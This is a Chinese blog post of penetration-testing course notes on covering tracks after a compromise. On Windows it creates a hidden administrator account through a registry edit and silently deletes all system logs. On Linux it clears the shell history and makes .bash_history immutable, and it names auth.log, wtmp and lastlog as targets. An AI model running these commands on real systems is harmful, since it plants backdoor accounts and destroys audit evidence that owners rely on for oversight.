Kali Linux渗透测试 049 清除痕迹

最新推荐文章于 2024-05-15 14:31:46 发布
最新推荐文章于 2024-05-15 14:31:46 发布
阅读量4.9k 收藏 27
点赞数 2
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79438198
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
1. 清除渗透攻击痕迹

1.清除渗透攻击痕迹

  • 最多也只是清除本地记录,如果有日志服务器的话还是会被记录下所有操作

  • windows 系统

    •禁止在登陆界面显示新建账号
•REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersio\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0
•del %WINDIR%\*.log /a/s/q/f
•History
•日志
•auth.log / secure
•btmp / wtmp
•lastlog / faillog
•其他日志和 HIDS 等


# 控制系统之后,新建账号并添加管理员组
C:\>net user user4 123456 /add
命令成功完成。
C:\>net localgroup administrators user4 /add
命令成功完成。
# 这样开机登录的界面会显示这个账户
# 可以通过添加注册表来隐藏
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v user4 /T REG_DWORD /D 0
C:\>REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v user4 /T REG_DWORD /D 0
操作成功结束
# 但是使用 net user 还是可以查看到这个账户


# 强制静默删除日志
C:\>del %WINDIR%\*.log /a/s/q/f

  • Linux 系统

    root@kali:~# history
# history 记录保存在 .bash_history
root@kali:~# ls -l .bash_history 
    -rw------- 1 root root 15418 3月   4 00:28 .bash_history
# 擦除痕迹
root@kali:~# history -c

root@kali:~# lsattr
    --------------e---- ./Downloads
    --------------e---- ./Desktop
    --------------e---- ./testDir
    --------------e---- ./Pictures
    --------------e---- ./Public
    --------------e---- ./vmware-tools-patches
    --------------e---- ./Videos
    --------------e---- ./Documents
    --------------e---- ./Music
    --------------e---- ./Templates
root@kali:~# chattr -h
    Usage: chattr [-pRVf] [-+=aAcCdDeijPsStTu] [-v version] files...

# 修改文件属性让其无法被写入数据
root@kali:~# touch 456.txt
root@kali:~# lsattr 456.txt 
    --------------e---- 456.txt
root@kali:~# ifconfig > 456.txt 
root@kali:~# chattr +i 456.txt 
root@kali:~# lsattr 456.txt 
    ----i---------e---- 456.txt
root@kali:~# ifconfig > 456.txt 
    -bash: 456.txt: 不允许的操作

# 修改 .bash_history,让其无法被写入,会变成只读文件
root@kali:~# chattr +i .bash_history


# 日志记录
•auth.log / secure
•btmp / wtmp
•lastlog / faillog

root@kali:~# cat /var/log/auth.log
root@kali:~# cat /var/log/wtmp
root@kali:~# lastlog
    用户名           端口     来自             最后登陆时间
    root             pts/3    172.16.10.1      日 3月  4 02:30:00 -0500 2018
    daemon                                     **从未登录过**
    bin                                        **从未登录过**
    sys                                        **从未登录过**
    sync                                       **从未登录过**
    games                                      **从未登录过**
    man                                        **从未登录过**
    lp                                         **从未登录过**
    mail                                       **从未登录过**
    news                                       **从未登录过**
    uucp                                       **从未登录过**
    proxy                                      **从未登录过**
    www-data                                   **从未登录过**
    backup                                     **从未登录过**
    list                                       **从未登录过**
    irc                                        **从未登录过**
    gnats                                      **从未登录过**
    nobody                                     **从未登录过**
网络安全打工人
关注
  • 2
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
提权
我不是大牛
07-15 1436
当我们拿到WebShell 之后,下一步干什么? 当然是权限提升啊! 简介 通过这些最初的漏洞利用途径,攻击者将获得一定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得比最初更多的权限,以期望从其他账户访问敏感信息,甚至或者获得对整个系统的完全管理控制。当攻击者以这种方式扩大其最初的未经授权访问的权限时,我们将其行为称为权限提升攻击。 水平权限提升(越权) 我们假设攻击者已经获得了在线银...
靶机渗透(零)清除痕迹
qq_42180996的博客
05-06 1045
清除痕迹 1.查看日志文件(/var/log) 2./var/log/auth.log(身份认证日志) 3./var/log/btmp(错误登录日志) 4./var/log/utmp(当前登录的用户信息) 5./var/log/wtmp(永久记录用户登录、注销及系统的启动、停机的事件) 6./var/log/faillog(登录失败日志) 7./var/log/lastlog(...
黑客神技:掩盖 Linux 服务器上的操作痕迹_linux 服务器入侵不留痕迹
2401_84302722的博客
05-15 325
该脚本只是用来清除攻击服务器之后遗留的一些痕迹。为了隐藏痕迹,黑客在针对服务器实施具体的攻击时,必须仔细考虑使用的每一个方法,以及入侵服务器之后如何隐藏自己的痕迹。通过上面的介绍我们了解到,时间戳也是 “会撒谎的”,因此系统管理员必须意识到他们的许多日志和保护措施是可以被操纵的,虽然看起来好像没有异常。还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!
权限提升之——linux提权
温柔小薛的博客
05-04 1176
linux提权 内容也蛮多的,大部分内容还是看的各位前辈的文章,这个文章算是几篇文章的结合,参考文章写在了文末,感谢各位前辈无私的奉献! Linux常用渗透命令学习 以下12类命令:系统信息查看类、文件目录类、驱动挂载类、程序安装类、源代码包安装、压缩解压类、进程控制类、程序运行类、用户帐号类、vi编辑类、网络服务、其他类等 (1):内核,操作系统和设备信息 uname -a 打印所有可...
域安全(3)相关工具在内网横向移动中的运用
weixin_51339377的博客
03-27 743
1.mimikatz在内网中的使用 域环境下用户的信息储存在ntds.dit中 加密后为散列值 windows密码一般由两部分 LM Hash + NTLM Hash user1:RID:LM-HASH:NT-HASH 1.在kali中输入mimikatz可以获取该工具的地址 /usr/share/windows-resources/mimikatz 2.只需要把mimikatz文件夹下的x64复制到目标计算机上即可 3.接下来在msf中的system权限下对该计算机..
Kali的history -c命令失效?
FisrtBqy的博客
04-28 3046
Kali的history -c命令失效? 环境:Kali 2021.3 在命令行中运行history -c命令,发现报错了: 经过一番网上搜索,发现原来是新版本的命令行不支持该命令了,于是查了以下Kali的更新说明,大致是以下意思: Kali2020.3稳定版开始引入 zsh,并宣布命令行工具从 bash 切换至 zsh 的计划(目前仍然默认使用 bash,2020.4 将默认使用 zsh)。 那Zsh是什么 某科介绍:Zsh(Z-shell)是一款用于交互式使用的shell,也可以作为脚本解释器来
Kali渗透测试技术实战
07-24
整个过程包含五个阶段:侦察、扫描、获取访问、维持访问以及清除痕迹。 第二章 下载并安装Kali Linux 硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、...
Kali Linux Network Scanning Cookbook
最新发布
05-16
Kali Linux是基于Debian的开源操作系统,专为渗透测试和安全审计设计,内置了大量的网络安全工具。 本书首先会讲解Kali Linux的基础知识,包括安装、配置和更新系统,确保读者对这个强大的平台有全面的了解。然后,...
渗透测试学习笔记资源
08-19
- **Kali Linux**:一个专为数字取证和渗透测试设计的操作系统。 ### 渗透测试最佳实践 - **持续监控**:定期进行渗透测试以保持系统的安全性。 - **培训员工**:增强员工的安全意识,减少人为错误。 - **修补管理*...
SSH-私钥泄露渗透测试配套ova环境
11-03
你需要配置虚拟机(通过使用VMware打开ova文件),确保它与Kali Linux在同一网段,以便进行内部网络的渗透测试渗透测试步骤可能包括: 1. **信息收集**:收集目标服务器的信息,包括IP地址、开放端口和服务版本...
一套渗透测试力作!20G视频教程+配套资料倾情奉献!.txt
08-20
Kali Linux是一款专门为渗透测试和安全审计设计的操作系统,内置了大量的安全工具。 ### 结论 这套包含20GB视频教程和配套资料的渗透测试资源,不仅适合初学者快速入门,也为专业人士提供了深入学习的机会。通过...
日志提权 /var/log/auth.log
m0_57221101的博客
03-27 3441
首先介绍一下这个日志,这个是ssh的登陆日志,会记录下ssh登录,sudo,su等命令的相关信息,这里需要重点提及的是,会记录下ssh登录时的用户名。 这个文件的权限一般是310所以不会被除root用户外的其他用户直接写入,一般也不能被除root组外的其他用户读取,但是一旦可以被读取,就可以在这上面下文章了 . ## 利用方法 之前说过auth日志会保存尝试ssh登录的用户名而不去校验这个用户名是否合法或在本地存在 那么我们就可以在用户名处注入可以被执行的脚本然后尝试访问他就可以实现RCE命令执
kali清除历史命令
weixin_45632448的博客
10-14 4226
kali 默认的 shell 环境已经从 bash 更改为 zsh,而history -c需要在bash环境下运行。因此执行history -c会报错。
Kali Linux渗透测试 048 收集敏感信息
kevinhanser
03-04 1118
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. 提权之后收集基本信息 2. WMIC(WINDOWS MANAGEMENT INSTRUMENTATION) 3. 收集敏感信息
Kali实战-提权
小水池
05-28 4582
本地提权 windows默认账号 user Administrator System #最高权限 关系图示: Linux默认账号 User Root ADMIN提权为SYSTEM 思路:利用windows中以system运行的程序进行操作,将系统提权 win xp、win2003 at 18:12(时间) /interactive cmd ...
入侵报告工具,以auth.log作为文件
weixin_34195546的博客
04-11 1250
2019独角兽企业重金招聘Python工程师标准>>> ...
linux的.bash_history
希望不是无解
02-23 2825
今天看到一个人写的文章,说通过.bash_history来获取SSH的私钥,很危险的说。 那么linux的.bash_history的作用是什么呢?这是一个博客上写的: Bash shell在“~/.bash_history”(“~/”表示用户目录)文件中保存了500条使用过的命令,这样可以使你输入使用过的长命令变得容易。每个在系统中拥有账号的用户在他的目录下都有一个“.bash_hi...
靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,留后门
7Riven's blog
01-29 925
1.主机发现 2.端口扫描 3.目录扫描 4.端口访问 尝试一下,含有文件包含漏洞 5.访问扫描出来的目录 发现登录端口,需要输入密码 尝试弱口令admin登录成功 信息查询,发现用户名、密码 md5解密试试,root用户密码为:34kroot34 zico用户密码为:zico2215@ 由于存在ssh服务端口,尝试连接 ...
如何清除 Linux 命令行历史记录
热门推荐
allway2的博客
11-08 1万+
出于安全原因,您可能希望清除历史文件和屏幕。某些 Linux 发行版可能会在您注销时清除屏幕,而其他发行版则不会。许多程序一次将输入读取为一行。 GNU 历史库能够跟踪这些行,将任意数据与每一行相关联,并利用来自先前行的信息来组成新行。Bash 和其他 shell 可能会使用这个历史库。默认文件是 ~/.history 或 ~/.bash_history。 Bash 的历史功能 bash 的历史函数依赖于一个名为HISTFILE的变量,通常设置为当前用户的.bash_history文件(位于用户的主目
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值